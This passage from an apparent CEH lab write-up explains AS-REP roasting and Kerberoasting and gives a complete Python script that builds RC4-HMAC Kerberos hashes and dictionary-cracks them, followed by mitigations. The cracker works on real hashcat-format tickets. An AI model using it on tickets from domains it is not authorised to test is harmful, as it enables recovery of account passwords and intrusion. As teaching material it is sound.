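Both hashes on this page, Joshua's AS-REP in Task 2 and DC-Admin's TGS here, are RC4-HMAC ciphertexts whose key is the account's NT hash; what Hashcat and John do is derive that key from each candidate, decrypt, and check the HMAC. The Python script below is an added example, not code from the page or from Impacket or Rubeus, that implements that inner loop end to end for both hash formats. It constructs its own sample hashes (a fixed confounder and a stand-in for the DER-encoded enc-part, so they are not real tickets) from the two passwords recovered in this lab; the SPN for DC-Admin is assumed.

```python
import hmac
import struct
from hashlib import md5

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib's md4 is usually disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = [(F, 0, range(16), (3, 7, 11, 19)),
              (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
              (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15))]
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for j, i in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[i] + k) & 0xFFFFFFFF, shifts[j % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = [(x + y) & 0xFFFFFFFF for x, y in zip((a, b, c, d), (aa, bb, cc, dd))]
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is the NT hash: unsalted MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):                      # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

# RC4-HMAC (etype 23, RFC 4757). The key-usage number names the message being protected:
# 8 = AS-REP enc-part (AS-REP roasting), 2 = the service ticket in a TGS-REP (Kerberoasting).
def rc4hmac_encrypt(key, usage, plaintext, confounder):
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, md5).digest()
    return checksum, rc4(hmac.new(k1, checksum, md5).digest(), data)

def rc4hmac_check(key, usage, checksum, edata):
    """The cracker's inner loop: derive keys from a candidate, decrypt, verify the HMAC."""
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    plain = rc4(hmac.new(k1, checksum, md5).digest(), edata)
    return hmac.compare_digest(hmac.new(k1, plain, md5).digest(), checksum)

# Hash lines as GetNPUsers.py (hashcat -m 18200) and Rubeus (hashcat -m 13100) write them.
def asrep_line(user, realm, checksum, edata):
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"

def tgs_line(user, realm, spn, checksum, edata):
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"

def parse_line(line):
    """Return (usage, checksum, edata); in both formats the 16-byte HMAC precedes the last '$'."""
    if line.startswith("$krb5asrep$23$"):
        usage, body = 8, line.split(":", 1)[1]
    elif line.startswith("$krb5tgs$23$"):
        usage, body = 2, line.rsplit("*$", 1)[1]
    else:
        raise ValueError("unsupported hash format")
    checksum, edata = body.split("$")
    return usage, bytes.fromhex(checksum), bytes.fromhex(edata)

def crack(line, wordlist):
    usage, checksum, edata = parse_line(line)
    return next((w for w in wordlist if rc4hmac_check(nt_hash(w), usage, checksum, edata)), None)

# Constructed sample: a stand-in for the DER-encoded enc-part, a fixed confounder (a KDC uses 8
# random bytes), the two passwords recovered in this lab, and an assumed SPN for DC-Admin.
SAMPLE_PLAIN, CONFOUNDER = b"constructed stand-in for the DER-encoded enc-part", bytes(range(8))
WORDLIST = ["123456", "password", "cupcake", "batman", "advanced!"]  # stand-in for rockyou.txt

def build_samples():
    cs, ed = rc4hmac_encrypt(nt_hash("cupcake"), 8, SAMPLE_PLAIN, CONFOUNDER)
    asrep = asrep_line("Joshua", "CEH.com", cs, ed)
    cs, ed = rc4hmac_encrypt(nt_hash("advanced!"), 2, SAMPLE_PLAIN, CONFOUNDER)
    return asrep, tgs_line("DC-Admin", "CEH.com", "MSSQLSvc/sql.CEH.com:1433", cs, ed)

if __name__ == "__main__":
    for line in build_samples():
        print(line[:48] + "...", "->", crack(line, WORDLIST))
```

Both sample lines crack from the five-word list. The reason the attack is cheap is visible in `nt_hash`: one unsalted MD4 per candidate, which is why RC4-HMAC tickets fall so much faster than AES etypes (whose keys come from PBKDF2 with 4096 iterations). The mitigations follow directly: long or managed (gMSA) service-account passwords, AES-only service accounts so no etype-23 ticket is ever issued, and no account left with pre-authentication disabled.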

